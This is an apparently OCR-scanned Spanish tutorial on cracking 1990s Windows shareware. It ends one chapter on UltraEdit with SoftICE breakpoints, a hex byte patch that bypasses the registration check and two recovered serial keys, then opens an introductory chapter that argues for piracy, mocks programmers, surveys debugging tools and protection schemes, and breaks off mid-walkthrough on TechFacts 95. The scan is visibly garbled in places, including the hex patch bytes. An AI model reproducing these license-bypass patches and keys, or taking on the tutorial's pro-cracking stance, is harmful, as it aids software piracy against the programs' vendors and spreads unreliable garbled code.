¡EBX es igual a una dirección fija de memoria la [004A0CDC]. Las direcciones fijas son 
¡las típicas variables globales tan mal utilizadas en los programas. Tenemos una variable 
global que controla la aparición de un mensaje de error. En algún punto del programa 
debe de inicializarse [004A0CDC] con un valor ,si localizamos este trozo de código, 
estaremos en plena rutina de comprobación. ¿Facil, verdad? 


Busquemos [004A0CDC] y veamos quien la inicializa, sólo nos interesan las sentencias 
que inicializen la variable, no las sentencias que comprueban su valor. Normalmente se 
inicializa por defecto a un valor de error (indicando que no estamos registrados) y se 
linicializa corectamente cuando nos registrmemos. Conforme aparecen occurencias de 
nuestra variable glabal sabemos que estamos en el buen camino porque siempre está 
¡rodeada de mensajes de error o de felicitación. 


Buscando [004A0CDC] encontramos las siguientes sentencias que modifican la variable 
(el resto de apariciones son comprobaciones del valor) 


:00405541 893DDC0C4A00 mov dword ptr [004A0CDC], edi 
:004056A3 891DDC0C4A00 mov dword ptr [004A0CDC], ebx 
:004057D4 8325DC0C4A0000 and dword ptr [004A0CDC], 00000000 
:00426924 891DDC0C4A00 mov dword ptr [004A0CDC], ebx 


:0043F684 C705DC0C4A0001000000 mov dword ptr [004A0CDC], 00000001 


Que tenemos aquí. Parece lógico pensar que en :004057D4 tenemos la incialización por 
defecto, ya que un AND con ceros da cero. La sentencia contraria la tenemos en 
:0043F684 que mueve 1 a la variable, esto sin duda indica que nos hemos registrado. 
También podría ser al revés, cero registrado, uno no registrado, pero este no es el caso. 
¡Basta ejecutar el Softice y poner bpr 004A0CDC 004A0CDC rw, la primera 
modificación debe ser la asignación por defecto, en este caso la :004057D4. Por tanto solo 
debemos centrarnos en la asignación a uno :0043F684, olvidando el resto de 
asignaciones. Esto es un axioma fundamental ante la duda, elige siempre la solución más 
sencilla. Bien, veamos que hay entorno a la :0043F684 


:0043F65C E89A560300 call 00474CFB 

:0043F661 8B7804 mov edi, dword ptr [eax+04] 

:0043F664 8B4514 mov eax, dword ptr [ebp+14] 

:0043F667 48 dec eax 

:0043F668 7478 je 0043F6E2 

:0043F66A 48 dec eax 

:0043F66B 0F85F9000000 jne 0043F76A 

1:0043F671 391DDC0C4A00 cmp dword ptr [004A0CDC], ebx 
:0043F677 0F85DA 010000 jne 0043F857 

:0043F67D 833DBC024A0000 cmp dword ptr [004A02BC], 00000000 
:0043F684 C705DC0C4A0001000000 mov dword ptr [004A0CDC], 00000001 


Tenemos diversos saltos que evitan nuestra asignación a uno. El primer salto, sestá en 
:0043F668 7478 je 0043F6E2 que tal si lo cambiamos por EB1A ¡mp 43F684. Osea, 
siempre saltamos a 43F684 evitando las comprobaciones de :0043F66B y :0043F677.El 
código EB es la instrucción de salto incondincional JMP, 1A es el número de bytes desde 
la sentencia condicional hasta la sentencia donde queremos saltar. Fácil, ¿verdad?. 


Perfecto, rula. Basta con buscar en el ejecutable uedit32 la secuencia 8$B451448747848 y 
cambiarla por 8B451448EB1A48. Pero hay un peque problema, el crack funciona pero 
no tenemos un número de serie correcto. En principio basta, pero pensando un poco 


¡podremos sacar nuestro propio número de Serie. ¿ Qué se os ocurre? 


¡Sip, exactamante,¿ que tal si le seguimos la pista a nuestro número de serie basura y 
¡vemos con quién se comparará? . La pregunata es, donde coloco un bpx para pararme 
justo antes de que se compruebe mi número de serie. La respuesta es sencilla, en 
:43F618 (echarle un vistazo al listado muerto) comienza la rutina en la que se asigna a 1 
nuestra variable glabal. Este puede ser un buen comienzo. Abrimos el Softice con el 
¡uedit, ponemos nuestro nombre Estado+Porcino y un número basura 1212121212121212 
. Cerramos el uedit y lanzamos de nuevo el SoftIce poniendo la sentencia bpx 43F618. 
¡Aparecemos en :43F618, ahora es el momento de buscan nuestro número de serie con s 


30:00 1 HH 1212121210 encontramos es :942F9C (esta direcciónpuede cambiar en tu 


¡ordenador). Borramos el punto de ruptura anterior con bc O y creamos uno nuevo con la 
dirección donde está nuestra password con bpr 942F9C 942F9C+f rw seguimos adelante 


¡con Crtl+D para ver quien caen en buestra trampa. Aparecemos en :40B73A con varios 
¡movsd , nuestra password se está copiando en otro sitio. La sentencia movsd, copia 
¡caracteres de ees:esi a ees:edi. Pongamos en el Softlce d ees:edi para ver como realmente 
se va a copiar, además pongamos otro punto de ruptura en la nueva posición de nuestra 
¡password con bpr ees:edi ees:edi+f rw .Curiosamente, si nos movemos un poco con los 
¡cursores por ees:edi aparecen las passwords correctas, pero todavía no es el momento. 
¡Lancemos de nuevo el Softlce con Crt1+D y aparecemos en :444FOE ,aquí encontramos 
'una pequeña comprobación, en ecx tenemos nuestra pass (para comprobarlo basta con 
¡poner d ecx) y en edx apuntamos a una zona de nuestro nombre, concretamente a 
'"tado+Porcino". Esto no es exactamente lo qu buscamos, así que sigamos adelante con 
¡Crtl+D y aparecemos en :444EBO con una comprobación entre edx y ecx a través de al. 
Curiosamente edx apunta a nuestra pass y ecx apunta a Y2+cHdcBd6=DBC/P este 
churro es la pass correcta, si seguimos con Crt1+D aparecemos en el mismo sitio con edx 
¡apuntando a nuestra pass y ecx apunta a JVWKTUUTHO02166710 otra pass correcta. A lo 
largo de la evolución del programa desde sus primeras versiones, se ha cambiado 2 veces 
de generador de pass por cuestiones de seguridad, ¡qué estúpidos!. Por eso la doble 


comprobación, ver si nuestra pass es del antiguo generador o del nuevo. 


¡Eso es todo por ahora, no seais unos descerebrados y utilicéis mi pass, buscad la vuestra, 
es mu sencillote. 


¡Espero vuestras opiniones, sugerencias y ensayos en estadoporcino Ohotmail.com 
¡En breve analizaremos tipos de protecciones mucho más interesantes. 


¡Recordad bebed de la fuente, buscad a +ORC en la red. 
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UN POCO DE TODO: 


¡Saludos Familia ! 


¡He decidido crear esta serie de capítulos con un objetivo puramente educativo (sin 
ningún tipo de obscuro interés comercial). Mi objetivo es ayudar a los nuevos crackers 
en sus primeros pasos. 


¡Agradecimientos 


Al TodoPoderoso +0RC, a su acólito +FRAVIA y a los miembros de WKT por su 
¡apoyo. 


¿Qué es eso de crackear? 


Crackear es el arte de reventar protecciones software/hardware con fines intelectuales, 
¡personales pero no lucrativos. Crackear también se llama ingeniería inversa (Reverse 
Engineering), ya que sin el programa fuente se es capaz de analizar el comportamiento 
del programa y modificarlo para tus intereses. 


¿Por qué crackear? 


Vivimos en un una sociedad que da asco. Es inconcebible que se destruyan o penalicen 
la producción de productos básicos (cereales,lácteos...) en aras de una estabilidad de 
precios.Vivimos en una sociedad donde el 95% de la gente se ve sometida al control de 
un 5 %. Toda persona debería tener un mínimo de recursos para ser feliz,pero esto no 
es así. 


El noble arte del crakeo es una herramienta para distribuir la riqueza entre la 
sociedad. Si necesitas un programa (que tienes en un CD-ROM) y no tienes una cuenta 
en un banco USA, ni 30 dólares, ¿por qué narices tienes que esperar y pagar si lo 
necesitas?, crackealo y publica el crack en Internet. Así ayudarás a la gente menos 
¡afortunada que está axifiada por esta sociedad desigualitaria. 


¿A quién va dirigido este curso? 


Este curso va dirigido a toda persona con interés en el crack y/o con la filosofía crack. 


Sin olvidar a los programadores. 


¿Qué es lo que vamos a aprender? 


Dejaremos de un lado el añorado DOS, para centrarnos en cracks para programas en 
WO95. 


¿No estaremos quitando el pan a los programadores de aplicaciones? 


Los programadores viven muy bien a costa de los royaltis que pagan las grandes 
empresas y esos repugnantes yupis encorbatados con escased de neuronas. Además, un 
programa crakeado es más conocido y utilizado que uno que no lo esté. Digamos que el 
crack es una forma de publicidad. Baste recordar el compilador de Pascal de la casa 
Borland. Originalmente fue copieteado y distribuido casi libremente hasta la saciedad. 
Borland conocía este hecho y por eso no introdujo ningún tipo de protección. Al cabo 
de poco tiempo, esos estudiantes se convirtieron en programadores que reclamaban a 
sus empresas la compra del compilador que sabían utilizar, el Pascal de Borland. Si las 
casas de soft ya son ricas sin nuestro dinero, ¿a que estado de corrupción se llegaría si 
lo tuvieran?. Aunque parezca extraño este ensayo está dedicado a formar a los 
programadores , mostrándoles sus defectos y el camino para producir software de 
calidad. 


En último caso depende de la conciencia de cada uno, si crees que un programador ha 
realizado una buena aplicación, que te es útil y que además está bien programada, 
entonces obra adecuadamente y recompénsalo registrándote. A decir verdad sólo he 
encontrado un programa de este estilo 


¿Qué necesito pa esto de crakear? 


- Interés y PazY Ciencia. 


- Algún conocimiento de ensamblador. Cuanto más conozcas mejor crackearás, pero 
para este curso mas bien poco, intentaré hacer las cosas fáciles. 


- Ayuda de otro cracker más experto (por ejemplo Estado+Porcino) 


IDEAS BÁSICAS SOBRE CRACKING 


¡Un programa no es más que un montón de instrucciones (haz, esto, haz lo otro), una 
tras otra. Estas instrucciones, (en general) están en memoria, parte de ellas se encargan 
de impedir la ejecución del resto (el verdadero programa). Resumiendo, tienes un 
bonito programa tras una puerta (esquema de protección), nuestro objetivo es reventar 
lla puerta, buscar la llave,pasar por las rendijas,quemarla..., como puedes ver una 
cantidad inagotable de ataques. 


'Un pequeño inciso, sólo puedes reactivar instrucciones que se encuentren en el 
¡programa. Por ejemplo, si se ha desactivado la opción de salvar, puede ser que el 
conjunto de sentencias para salvar el programa esté presente pero desactivado, o bien 
¡que simplemente no esté. Si están las sentencias, se pueden reanimar, sino están 
¡entramos en un mundo diferente, una evolución del cracking, la apasionante 
Reconstrucción Software, pero eso será tema de otro capítulo. 


¡Herramientas CRACK 


¡Demos un breve repaso a las principales herramientas que utilizaremos a lo largo del 
¡curso. Existen otras muchas herramientas que las comentaré cuando nos sean 
necesarias. 


¡Editor hexadecimal 


Los programas no son más que un conjunto de instrucciones y cada instrucción no es 
¡más que un conjunto de bits, pero donde demonios se guardan esos bits?. 


¡Los bits del programa se localizan en los ficheros, p.e. las instrucciones del programa 
de compresión arj se guardan en el fichero arj.exe. Hay algunos programas que no 
¡guardan todas sus instrucciones en único fichero, si no en varios, un ejemplo de esto 
¡son los programas que utilizan librerías dinámicas (o dil) 


Un editor hexa, no es más que un programa, que permite "'editar'' los ficheros de 
instrucciones de otros programas, osea, que permite ver,modificar,copiar,pegar... los 
bits de los programas. Para simplificar la cosa no se muestran los bits a pelo, sino que 
¡se muestran en hexadecimal, de ahí su nombre. Nosotros lo utilizaremos para alterar el 
¡comportamiento de los programas. Supongamos que conocemos la instrucción 
sentencia de la rutina de protección que debemos modificar, sea jz 23 y queremos 
¡modificarla por jnz 23, bien como toda instrucción no es más que un conjunto de bits, 
¡sea 0110 para jz 23 y 1001 para jnz 23, sólo nos queda buscar estos bits dentro del 
fichero ejecutable del programa (que es, en general, el contiene las sentencias del 
¡programa). Como usamos un editor hexa, debemos buscar la secuencia de un unos y 
¡ceros en hexa en el fichero del programa que queremos modificar. Si la secuencia que 
buscamos es muy común deberemos utilizar las instrucciones que se encuentran 
entorno a la instrucción a modificar. 


¡Esto es muy importante, sólo debe existir una localización del patrón de búsqueda en el 
fichero, si existe más de una, debemos añadir a la búsqueda las sentencias de alrededor, 
¡sino se corre el riego de modificar la sentencia equivocada, lo que provoca casi siempre 
un "cuelgue". 


Un no es más que una modificación de las instrucciones de un fichero, así pues para 
hacer un crack debemos saber que instrucciones modificar y en qué fichero. Una vez 
crackeado el fichero, el programa se comportará siguiendo la nueva sentencia que le 
hemos modificado. 


Hay un montón de editores hexa, yo os recomiendo UltraEdit-32 Professional, os lo 
podéis bajar de http://ftpsearch.ntnu.no/ 


(excelente herramienta de búsqueda en la Web, utilízala cuando no encuentres algún 
¡fichero) busca w32dasm. Yo utilizo la versión 4.31a. Cada cracker tiene su editor 
favorito, !encuentra el tuyo!. Este programa es shareware, así que tendrás que 
crackearlo, recuerda : lo primero que tienes que crakear son tus propias herramientas. 
Si no puedes crackearlo, busca otro editor hexa, los hay a montones. 


¡Desensamblador 


Un desensamblador toma un fichero de instrucciones en hexa y lo convierte a lenguaje 
ensamblador. El lenguaje ensamblador, es el conjunto de sentencias que entiende el 
microprocesador (tu Pentium o mi 486). El procesador es el corazón del ordenador, 
todas las sentencias son ejecutadas por él y sólo por él. Por ejemplo un 43 en hexa se 
transforma en inc eax. Se necesitan algunos conocimientos de ensamblador pa esto de 
crackear. 


Nosotros usaremos el desensamblador para crakear con la técnica de la lista muerta 
que veremos más adelante. 


Puedes pillar un magnífico desensamblador para W95 en 
¡http://www/expage.com/page/w32dasm , €s Shareware, así que deberás crackearlo. 
¡Próximamente le dedicaremos un capítulo al w32dasm y aprenderemos a crackearlo. 
'Yo utilizo la versión 8.9, aunque una posterior es también útil. 


Debugger 


Un debugger permite ejecutar instrucción a instrucción (instrucciones en ensamblador, 
se entiende) un programa, por tanto también ejecutará instrucción a instrucción la 
rutina de protección, ya que es parte del programa. Esto nos permitirá analizar su 
comportamiento. 


¡El mejor debugger para W95 es sin duda el Softice quo te lo puedes bajar de 
¡http://www.numega.com , es sin duda uno de los mejores programas que he visto en mi 
vida. Te recomiendo que te bajes también los manuales. El Softice es una de las mejores 


¡herramientas cuanto más domines al Softice, mejor crakearás, y te aseguro que se 
pueden realizar verdaderas maravillas con él. Para trazar (esto es, pasar el debug) a 
programas MS-DOS, puedes utilizar versiones anteriores del Softice o utilizar algunos 
de los excelentes debugger que hay para Dos como el SymbDebug. 


Os indicaré un par de consejos y trucos para el Softice. 
--> Instalación 


Haz la prueba de pantalla, si te la saltas, lo más seguro es que cuando actives el Softice 
se te quede la pantalla a rayas. Busca el driver de la tarjeta de vídeo que tengas 
instalada en W95 dentro de la lista que se ofrece. Aunque la encuentres, haz la prueba 
de pantalla, es posible que no funcione correctamente. Si no encuentras tu tarjeta de 
vídeo o tienes problemas de pantalla, corta la instalación y selecciona ''Adaptador de 
Vídeo Standard VGA", reinstala el Softice y utiliza ese mismo driver para la prueba de 
pantalla. Si sigues teniendo problemas te remito a la Doc del Softice (que deberías 
haberte bajado). Particularmente, con el adaptador Standard VGA no he tenido nunca 
problemas. Hay por ahí sueltos una ampliación de drivers de tarjetas para Softice, 
búscalos si no quieres pasa a la VGA Standard. 


Activa la opción de ratón, te evitará escribir bastantes secuencias hexa de instrucciones, 
te permitirá moverte libremente por las ventanas, seleccionar, copiar y pegar texto así 
como redimensionar las ventanas. 


--->Configuración 


El Loader es una pequeña utilidad que permite especificar el programa que queremos 
depurar y además nos permite configurar el Softice, En Edit/Softlce Initialization 
Settings/Initialization string pon X;wl;wr;wd7; code on; y en Histoy Buffer Size pon 
512 

Abre el fichero winice.dat (dentro del directorio de instalación del Softice) , toda línea 
del tipo EXP=c:1windowsisystemisystem.drv , quítale el punto y como inicial. 


--->Ejecución 


El Softice debe cargarse siempre antes que W9S5. Si estas en W95, reinicializa en modo 
MS-DOS y ejecuta WINICE.EXE, este cargará el Softice y W95. Te recomiendo que 
utilices un fichero bat. 


Las ventanas que aparecen son 


Ventana de registros de la CPU (wr). A los típicos se ha añadido una E así se diferencia 
¡los registros normales que admiten 16 bits, de los registros que soportan 32 bits. Por 
ejemplo, ax se llama ahora eax. Siempre podremos referencias a ax, sabiendo que nos 
quedaremos con 16 bits últimos de eax. 


¡Ventana de datos de la CPU (wd). Muestra la memoria en formato hexa, ahí se pueden 


lapreciar los datos que maneja el programa, entre otras cosas. 


'Ventana de código (wc). Muestra, la dirección de memoria en la que se encuentra la 
instrucción, la codificación hexa de la instrucción y la instrucción en ensamblador. 


¡Ventana de control, el la que aparece arriba el nombre del programa que estamos 
¡trazando. Aquí es donde introduciremos los comandos del SoftlIce. 


¡He aquí algunos comandos fundamentales para el Softice: 
¡CTRL+D 


¡Conmuta de W95 al Softice y viceversa. No te asustes por el pantallazo ni por el aspecto 
¡cutre inicial, llegarás a quererlo, créeme. Si salen rayas, vuelve a leer el apartado -- 
>Instalación 


¡F4 


¡Estando en Softice, te permite echar un ojo al estado actual en W95 sin necesidad de 
conmutar. 


¡FS 


¡Ejecuta una instrucción, las modificaciones en los registros del sistema aparecen de 
¡diferente color. Si la instrucción es una llamada a una rutina, se ejecutarán una a una 
¡todas las instrucciones de la rutina llamada. 


¡FIO 


¡Ejecuta una instrucción, las modificaciones en los registros del sistema aparecen de 
¡diferente color. Si la instrucción es una llamada a una rutina, se ejecutan de golpe todas 
¡las sentencias de la rutina llamada. 


¡FI1 


¡Ejecuta de golpe todas las instrucciones de la rutina actual y se para el la instrucción 
¡siguiente de la rutina padre que llamó a esta rutina. Esto nos permite trazar al padre, 
¡estando en una rutina hija. En cuanto la uses menudo verás que no es tan complicado 
[como parece. 


¡FI2 
¡Ejecuta todas las sentencias hasta el primer ret (incluido) 
¡bpx nombreRutina 


¡Salta al Softice cuando se ejecuta la rutina cuyo nombre es nombreRutina. Ejemplo 
¡bpx messageboxa saltará al Softice cuando el programa muestre una ventana de 


mensaje del tipo mensaggebox. 
bpx dirInstrucción 


Salta al Softice cuando se ejecuta la instrucción que está es la dirección de memoria 
dirInstrucción. 


bpr dirIni dirFin rw 


Salta al Softice cuando hay un acceso de lectura o escritura en las direcciones 
dirIni,dirFin ambas incluidas. Ejemplo bpr 100 109 rw que puesto de otra forma más 
fácil de expresar, nos queda algo como bpr 100 100+9 rw 


sl dir tam'cad' 


Busca la cadena cad a partir de dir hasta dir+tam. Esta sentencia casi siempre tendrá 
este aspecto. Ejemplo s 30:00 1 ffffffff 'cad' . Las comillas son importantes. 30:00 es la 
dirección de comienzo del segmento de datos, osea la dirección de memoria donde están 
los datos del programa y ffffffff es el tamaño del segmento de datos, como veréis hay 
4GB de espacio para almacenar datos. 


d registro 


Muestra en la ventada de datos el contenido de lo que hay a partir de la dirección 
guardada en registro. Ejemplo d eax muestra a lo que apunta eax. 


d dirección 
Muestra en la ventada de datos el contenido de lo que hay a partir de la dirección. 
d nomRutina 


Muestra en la ventada de datos el contenido de lo que hay a partir de la dirección 
donde comienza la rutina nomRutina. 


Impr Pant 


Vuelca el contenido de la pantalla por la impresora, quizás tengas que darle varia veces 
hasta que el buffer de la impresora se llene. 


[ESQUEMAS DE PROTECCION 

Citaré algunas de las técnicas utilizadas por los programadores para proteger su soft. 
- Números de Serie. 

- Cripple Software (software limitado), en diversas variantes: 
* Tiempo limitado a meses , días, minutos.. 

* Número de ejecuciones o usuarios limitado. 

* Funciones deshabilitadas. 

- Protecciones por discos o CD-ROM llave. 

- Protecciones anti herramientas crack 

* Antidebuggers. 

* Antidescompiladores. 

* Antidesensambladores. 

* Encriptación parcial o total. 

- Ninguna de las anteriores. 

¡Acerca de los programadores 

Sólo dos cosas: 


a) En general son perezosos y a veces estúpidos. 

b) Nunca les creas. 

¡La opción a) es clara, sus esquemas de protección son arcaicos, apenas han sufrido 
modificaciones, tan sólo incorporan trucos viejos sobre esquemas bien conocidos. 
Programas en lenguajes de alto nivel tipo C++, Visual Basic, estos compiladores se 
basan en librerías bien conocidas. El programador no tiene el amor propio de crear su 
propia rutina de protección en ensamblador, prefieren dejarla en manos de 
compiladores que crean código ensamblador ineficiente y fácilmente legible. ¿A qué se 
debe todo esto?, a su mentalidad comercial de la vida, no trabajan por placer, son 
esclavos de su trabajo, verdaderos zombies andantes. Lo importante es acabar y pronto 
no importa la calidad del soft o las quejas del estúpido usuario por la lentitud del 
programa o por los "cuelgues". 


Una breve disgresión, no os habéis preguntado por que las versiones de los programas 
¡salen como churros cada 2 días. La respuesta es que se dejan a propósito las cosas sin 


¡hacer o mal hechas para que al cabo de dos días se pueda sacar una flamante nueva 
versión con una leve modificación la cual debes comprar para no quedarse obsoleto, 
Dios mío que abominación! 


Respecto a b) baste decir que siempre tratan de encubrir sus errores con malolientes 
mentiras. 

PROGRAMADORES, leed esto y aprended, pero que digo, no tenéis tiempo ni para 
¡joder, ni para ver por donde os joden....:-) 


ESQUEMAS DE PROTECCIÓN BASADOS EN NÚMEROS DE SERIE 


Esta es una "antigua" técnica de protección utilizada por las toneladas de shareware 
que nos inundan, basta comprarse un CD por 4 perras y ver 650 MB de programas 
basura, en general, deseosos de exprimir nuestras carteras. Veamos como funcionan. 


El programa puede ser total o parcialmente funcional, pero posee estúpidas ventanas 
que nos recuerdan que somos usuarios no registrados, o bien pitidos mal sonantes o 
mensajes perennes proclamando que les mandemos dinero. A veces, pasado cierto 
tiempo o pasado un número de ejecuciones, el programa deja de funcionar. Todo esto 
inconvenientes se resuelven llamando a la casa que construyó el software (imaginad lo 
que puede costar una llamadita o un Fax a un pueblo mal oliente del esto de Utah en 
USA), o bien mandando un e-mail. En cualquier caso hay que indicar el número de 
VISA donde ellos clavarán sus garras para rellenar sus ya nutridas arcas. Una vez 
desplumado recibimos por e-mail o por teléfono una palabra mágica, un número de 
serie, una password, o lo que sea, yo lo llamaré 'pwd''. Esta pwd desbloquea el 
programa y/o elimina las estúpidas ventanas recordatorio. 


Análisis de esquemas con número de serie 


En general existen dos formas en las que trabajan las rutinas de protección de número 
de serie: 


a) Número de serie independiente del usuario. 

b) Números de serie adaptados al usuario. 

a) si extraemos una pwd, ésta servirá a todos los usuarios. Una pwd válida se diferencia 
de una inválida (por las muletas, es un chiste) por la presencia de ciertos caracteres en 
posiciones fijas (p.e. el carácter 8 debe ser una 'C', el 10 un '-'). Toda pwd que cumpla 
las restricciones será una pwd válida. Por norma, casi todas las pass incorporan el 
carácter '-', 2b en hexa. A veces no se requieren caracteres fijos , sino que la suma 
ASCII cumpla cierta condición. Cada letra del alfabeto y cada carácter numérico tiene 
una cantidad asociada, su código ASCII (p.e. par el acute0acutees el 30 en hexa o el 40 
en decimal). La técnica consiste en sumar el código de cada carácter y comprobar la 
suma (que a veces se llama checksum) con una cierta cantidad. Una variante es 
modificar el valor ASCII a través de una tabla que asocia a cada carácter un número 
distinto. 


¡Crackear esto es fácil de crackear: 


cmp suma,sumacorrecta ---->cmp suma,sumacorrecta 

JZ OK eononnonannonnn >jnz ok 

Es posible mezclar las tres técnicas, caracteres fijos, cheksum y modificación del código 
ASCII. En un capítulo próximo veremos un ejemplo de esto. 


b) En este caso se utiliza el nombre, los apellidos, o el nombre de la empresas o todo 
¡junto para generar un pwd. Aquí las técnicas son más imaginativas: coger cierto 
caracteres y repetirlos hasta llegar a un tamaño, usar el código ASCII de ciertas 
caracteres como índice de una tabla de encriptación...En fin, depende de las paranoias 
del programador. Lo cierto es que se debe generar la pwd correcta para nuestros dato 
y ésta se debe comparar con la introducida. Aquí es donde podemos atacar ,en al 
comprobación. Realmente no hace falta crackear, basta con copiar la pwd correcta e 
introducirla como nuestra pwd, o bien crackear las sentencias de comprobación para 
que sirva cualquier pass. Lo primero es mejor ya que nos servirá para futuras 
versiones. 


Se puede mezclar ambas técnicas, como veremos en un capítulo próximo, y generar un 
checksum para una cierta cadena extraída a partir de los datos del usuario y 
comprobar el cheksum de nuestra cadena. 


¿Cómo atacar? 


Antes de ir como unos desposeídos a reventar el programa, es totalmente necesario 
echar un vistazo, ver el posible esquema de protección y los posibles puntos de ataque. 
En general no hay que buscar mucho, los puntos débiles tiene un letrero rojo que dice '' 
Hey estoy aquí”. 


En el caso de los esquemas basados en números de serie, la cosa está clara: esos 
estúpidos mensajes recordatorios son la puerta de entrada. Si somos usuarios no 
registrados aparecen, si nos registramos desaparecen. Por tanto debe haber algo que 
indique cuando deben o no aparecer, este algo es un flag, que no es más que un 
conmutador (como el de una bombilla). Cuando está en ON aparecen los mensajes, 
cuando en OFF desaparecen. En nuestro contexto, un flag no es más que una posición 
dentro de la memoria con un cierto valor. La memoria del ordenador es como un 
cartón de huevos (1 huevo = 1 bit), donde cada hueco tiene un número diferente al que 
se le llama dirección de memoria. En cada hueco puede haber un huevo (valor 1) o no 
haberlo (valor 0). Los agujeros se agrupan, 8 agujeros es un Byte, 1024 Bytes es un 
MegaByte o MB, 1024 MB es un GigaByte o GB, 1024 GB es un TeraByte o TB. Fácil, 
¿verdad?. La memoria está compuesta de bits, estos bits se pueden interpretar de 
muchas formas, flags, datos, instrucciones. Por ejemplo 01010101 puede ser un flag de 
activación, la cadena ''hola'" o lo sentencia pinta la pantalla, depende de como lo 
consideremos. En el caso de tomarlo como instrucciones, se habla de dirección de la 
instrucción en memoria, que no es más que la dirección del primer del primer bit que 
la compone. 


El valor que podemos encontrar en un flag puede variar. Para ON podemos encontrar 
un 1 y para OFF un 0. Se puede usar la llamada lógica negada y tiene en ON un 0 y en 
OFF un 1. Todo lo que se pueda hacer con 0 y 1, se pude reconvertir cambiando los 0 
por 1 y los 1 por 0. Una "mejora" de los programadores es utilizar flags distintos a 0,1, 
cuán inteligentes!. Recuerdo cierto esquema que utilizaba el flag DEAD en 
hexadecimal. Los sistemas de numeración (como el hexadecimal o hexa para abreviar) 
son formas diferentes de contar y de representar cantidades. En base 10, la de toa la 
vida, se empieza en 0 y se acaba en 9. en hexa se comienza en 0 y se acaba en F 
(10=a,11=b,12=c,13=d,14=e,15=f). 


Veamos algo más práctico: 
cmp ax,flag; Compara el valor de ax con el valor del flag 
¡jz mensajes; Si son iguales muestra los mensajes. 


sigue: inc dx; Continúa normalmente. 


¡mp sigue;Salta y continua normalmente. 


Este puede ser un esquema típico. Dependiendo del valor del flag se muestran los 
mensajes o no. 


Llegamos a la parte interesante, cada mensaje recordatorio debe tener una 
comprobación como la del ejemplo. Basta con analizar los mensajes recordatorio y 
descubrir la dirección de memoria del flag. Pero quién narices rellena el flag?. 
Obviamente debe haber como mínimo dos inicializaciones, una al comienzo de la 
ejecución del programa que pone al flag a OFF y la rutina de protección que lo debe 
poner a ON si la pwd es correcta. ¿Me sigues hasta ahora?. 


Es fácil ahora saber donde atacar, un crack elegante sería poner la inicialización al 
comienzo del programa a ON en vez de OFF. Recuerda esto: ' Un buen cracker debe 
¡ser ante todo elegante y sutil, nada intrusivo". 


Otro punto de ataque 


Hasta ahora hemos visto que analizando los estúpidos mensajes se puede conocer la 
dirección de memoria del flag y a partir de ahí su inicialización. Pero en los esquemas 
basados en números de series existe un punto de entrada más claro aún que los flags: la 
propia rutina de protección. Veamos un método sencillo para llegar a ella. 


| 
¡Si uno se va a la opción de registro e introduce un número de serie falso, aparecerá una 
estúpida ventana indicando que nos hemos equivocado: ''Soryy your password is 
¡invalid'' o algo parecido que traducido al cristiano es '"Tío te ha equivocado, 
JAAARL". Esto no es una vía de entrada, esto es una autopista de 1GB de carriles. 
¡Basta con pensar un poco, quién es la encargada de mandar este mensaje? 
evidentemente la propia rutina de protección, interesante verdad?. Ya sólo queda 
encerrar la rutina, ver como trabaja , cambiar un par de bytes (siempre de la forma 
más elegante posible) y listo, programa crackeado. 


¡Comparación de ataques 


¡¿Qué crack es mejor?, el de flags o de la rutina de protección?. Esto depende en gran 
¡medida de programa, de tus habilidades y del tipo de que dispongas. Con la rutina de 
¡protección se puede analizar en profundidad el esquema, ver como trabaja y hasta 
extraer tu propio número de serie, osea el número de serie que la empresa te da si te 
registras, pero esto requiere tiempo y esfuerzo, obteniendo una satisfacción moral e 
intelectual. Además, en la próxima versión del programa est pwd posiblemente 
funcionará y no necesitarás crackear de nuevo. Mediante cracks al flag, se requiere un 
tiempo menor, pero la próxima versión habrá que crackearla de nuevo (no importa 
¡seguro que estos estúpidos programadores habrán seguido la mismo patrón de 
protección). Un crack a la rutina de exige un conocimiento profundo de la misma, lo 
¡que puede llevar a tu propio generador de claves (igualito o seguramente mejor que el 
tiene la empresa). 


CÓMO CRACKEAR TECHFACTS 95: 


Objetivo: TechFacts 95. 

Versión: 1.30 3/7/97 

¡Nombre del ejecutable: Teckfct95.exe 

Website: http://ourworld.compuserve.com/homepage/deansoft 
'Tamaño del ejecutable: 1.251.840 bytes. 

'Tipo de protección: Por número de serie. 

Dificultad: ameba. 

¡Tiempo de crackeo: 2 minutos. 

Herramientas: Softlce 3.0 y Editor Hexadecimal. 


¡Siguiendo las recomendaciones de +ORC empezaremos por crackear nuestras propias 
herramientas crack. El programa en cuestión es una pequeña joya que nos permitirá, 
entre otras muchas cosas, rastrear las acciones de un determinado programa, buscar 
¡cadenas de caracteres en ficheros, trabajar con dll.. Generalmente,lo utilizo para 
¡rastrear programas de instalación, obteniendo información de los ficheros creados, las 
entradas de registro añadidas o borradas, ... 


Manos a la obra. El programa es un ejecutable que no necesita otro fichero para 
funcionar (cosa rara en estos días). Así pues, arranquemos el programa veamos lo que 
ocurre. Aparece una horrible ventana diciendo que utilicemos nuestra VISA o 
MASTERCARD y que soltemos los 19,99 dólares (unas 2500 pesetas) que tenemos para 
ir a tomar cervezas. 


Echemos un vistazo al programa. Entre otras cosas, hay una opción en 
TOOLS/WATCH SYSTEM, que nos permite rastrear un programa. En HELP/HELP 
TOPICS/ORDER FORM aparece una hoja de registro en la que nos avisa de que 
además tenemos que paga 2 dólares para gastos de envío, ¡cómo si costará 250 pelas 
enviar un mail con el número de serie!. 


En HELP/ABOUT TECHFACTS 95 encontramos un botón USE REG KEY. Aquí es 
donde tenemos que introducir nuestro Nombre (First name), apellidos (Last name) y el 
número de serie correspondiente que lo recibiremos por mail si pagáramos 19,99 dólares 
más 2 dólares de gastos de envío. Empecemos por aquí. 


Pongamos un nombre, un apellido y un número cualquiera y pulsemos el botón 
REGISTER. Entonces escuchamos un pitido y aparece una ventana de mensaje diciendo 
REGISTRATION KEY FAILED. Ahora ¡pensemos un poco!, apliquemos un poco de 
ZEN CRACKING. 


Lo único anormal es el pitido. Si tu fueras un programador y quisieras que pitará tu 
"cacharro" tienes dos opciones construirte un bonito programa en ensamblador que lo 
haga, o bien utilizar una función de pitido presente en alguna de las vomitivas librerías 
de funciones, también llamadas API. ¿ Qué piensas que ha hecho nuestro ''vago" 
programador ?. ¡Bingo! ha utilizado la función MessageBeep de la librería 
USER32.DLL. Este un punto de ataque muy claro, aunque existen muchos otros. 


Apliquemos la técnica LIVE, es decir, utilizaremos el Softlce. Reinicialicemos nuestro 
ordenador en modo Ms-Dos, lancemos el WinlIce y volveremos a Windows. 


Abramos el LOADER de Softlce y en FILE/OPEN MODUL E seleccionemos el fichero 
Tekfct95.exe. Pulsemos Load o el botón con las ruedecillas dentadas. Nos aparece una 
